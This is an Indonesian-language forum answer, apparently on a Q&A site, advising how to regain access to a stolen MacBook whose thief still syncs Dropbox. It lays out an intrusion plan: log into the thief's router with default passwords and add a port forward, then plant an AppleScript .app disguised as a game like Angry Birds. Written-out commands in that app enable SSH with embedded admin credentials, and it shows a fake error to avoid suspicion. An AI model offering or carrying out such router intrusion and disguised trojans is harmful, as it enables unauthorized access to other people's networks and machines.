Saya ingat menonton video Dr. Zoz itu. Barang bagus.
Sepertinya Anda kompeten dengan skrip shell dan hanya perlu vektor serangan. Kunci untuk melakukan sesuatu yang mirip dengan yang dilakukan Zoz adalah mendapatkan akses SSH. Tidak seperti situasinya, di mana pencuri itu menggunakan modem dialup, hampir pasti, karena Mac yang lebih baru tidak melakukan dialup, bahwa pencuri itu menggunakan koneksi broadband, dan berada di belakang semacam router NAT.
Bahkan jika SSH diaktifkan pada mesin, penerusan port harus diatur pada router agar Anda dapat mengakses port mendengarkan SSH mesin dari luar. Kelebihan dari koneksi broadband adalah bahwa alamat IP hampir pasti akan berubah lebih jarang daripada dengan dialup.
Jika saya berada di posisi Anda, memegang IP pencuri, pertama-tama saya akan mencoba masuk ke antarmuka web router mereka dan melihat apa yang bisa saya lakukan dari sana. Sungguh menakjubkan betapa banyak orang meninggalkan kata sandi router / modem default mereka di tempat, dan ada daftar online di mana Anda dapat menemukan kata sandi default untuk sebagian besar produsen utama.
Setelah masuk, periksa daftar klien DHCP pada router dan lihat apakah Anda dapat menemukan MacBook. Banyak router akan menunjukkan alamat MAC (perangkat keras), alamat IP internal yang ditetapkan (192.168.1.x paling sering) dan yang paling penting, nama mesin.
Cari tahu IP mana yang ditetapkan untuk MacBook dan kemudian atur port forward untuknya dalam pengaturan router. Gunakan beberapa port eksternal selain 22, (port 2222 misalnya) dan teruskan itu ke port 22 dari IP MacBook.
Banyak perute yang mengaktifkan akses SSH, sehingga mengakses IP @ port 22 pencuri mungkin akan membawa Anda ke cangkang router daripada cangkang mesin. Sekarang Anda harus memiliki port pada IP eksternal pencuri (yang Anda dapatkan dari Dropbox) yang akan membawa Anda langsung ke port yang seharusnya terikat oleh SSH di MacBook. Kecuali SSH belum dinyalakan.
Bagian ini membutuhkan tindakan dari pencuri. Saya suka ide email tetapi mengharuskan teman Anda menggunakan Apple Mail. Pendekatan yang lebih baik mungkin mengunggah file .app yang menggoda ke Dropbox yang akan mengaktifkan SSH (Remote Login).
Anda dapat melakukan ini melalui skrip shell, tetapi melakukannya melalui Applescript, menyimpan Applescript sebagai .app dan memberikannya ikon yang bagus semua akan jauh ke arah membodohi tanda Anda dan tidak memberikan diri Anda.
Berikut kode Applescript untuk mengaktifkan Remote Login:
do shell script "sudo systemsetup setremotelogin on" user name "Friend's Username" password "Friend's Password" with administrator privileges
Sedikit kode ini akan mengembalikan string dengan nomor seri mesin yang dapat Anda kirimi email kepada diri sendiri jika Anda ingin melakukannya:
do shell script "sudo system_profiler |grep \"r (system)\"" user name "Friend's Username" password "Friend's Password" with administrator privileges
Saya akan menulis applescript sehingga menyalakan Remote Login, melakukan apa pun yang Anda butuhkan. Cobalah untuk tidak menulis GUI atau aplikasi apa pun selain shell karena ini akan menimbulkan kecurigaan. Pada akhirnya tampilkan pesan dengan efek "Aplikasi ini tidak dapat berjalan pada Macintosh ini." dengan tombol "Berhenti" untuk mengurangi kecurigaan. Setelah skrip bekerja di AppleScript Editor, simpan sebagai file .app yang hanya dijalankan.
Cobalah menyamarkan .app sebagai game populer, Plants vs. Zombies atau Angry Birds atau sesuatu. Anda dapat mengekspor ikon dari .app game sebenarnya dan memasukkannya ke .app yang Anda ekspor dari Applescript. Jika teman Anda melihat si pencuri, Anda dapat secara sosial membuat profil dan menyamarkan .app sebagai sesuatu yang lain yang mungkin menarik bagi Anda.
Asalkan Anda dapat mengatur port forward (tanda Anda tidak memberlakukan praktik keamanan yang tepat), dan Anda bisa membuatnya menjalankan aplikasi, Anda akan memiliki akses SSH penuh ke mesin dan dapat terus mencari petunjuk tanpa segera berikan kehadiran Anda. Ini juga mengharuskan tanda tidak bosan dengan pemberitahuan Growl Dropbox dan berhenti, jadi saya sarankan teman Anda untuk berhenti menyimpan file ke Dropbox-nya untuk sementara waktu.
Catatan: Jika pencuri terputus dari ISP mereka dan menghubungkan kembali, mereka akan mendapatkan IP eksternal baru. Tambahkan file ke Dropbox dan tunggu sampai disinkronkan. Ini akan memberi Anda IP yang diperbarui.
Catatan 2: Jika pengguna tidak terhubung ke perute dengan MacBook untuk jangka waktu tertentu (biasanya 24 jam) penyewaan DHCP untuk alamat IP internal yang ditugaskan untuk MacBook akan kedaluwarsa. Kemungkinan besar itu akan mendapatkan alamat IP yang sama lain kali terhubung, kecuali perangkat lain diperkenalkan ke jaringan. Dalam acara ini Anda harus secara manual masuk kembali ke router dan memodifikasi port forward.
Ini bukan satu-satunya cara serangan, tetapi inilah yang akan saya lakukan begitu saya menyadari IP masih diperbarui melalui Dropbox. Semoga berhasil!
EDIT: "hak istimewa administrator" di akhir setiap baris "lakukan skrip shell" sangat penting. Pengguna akan dimintai kata sandi admin teman Anda dan skrip akan gagal, jika Anda tidak memasukkan nama pengguna dan kata sandi inline.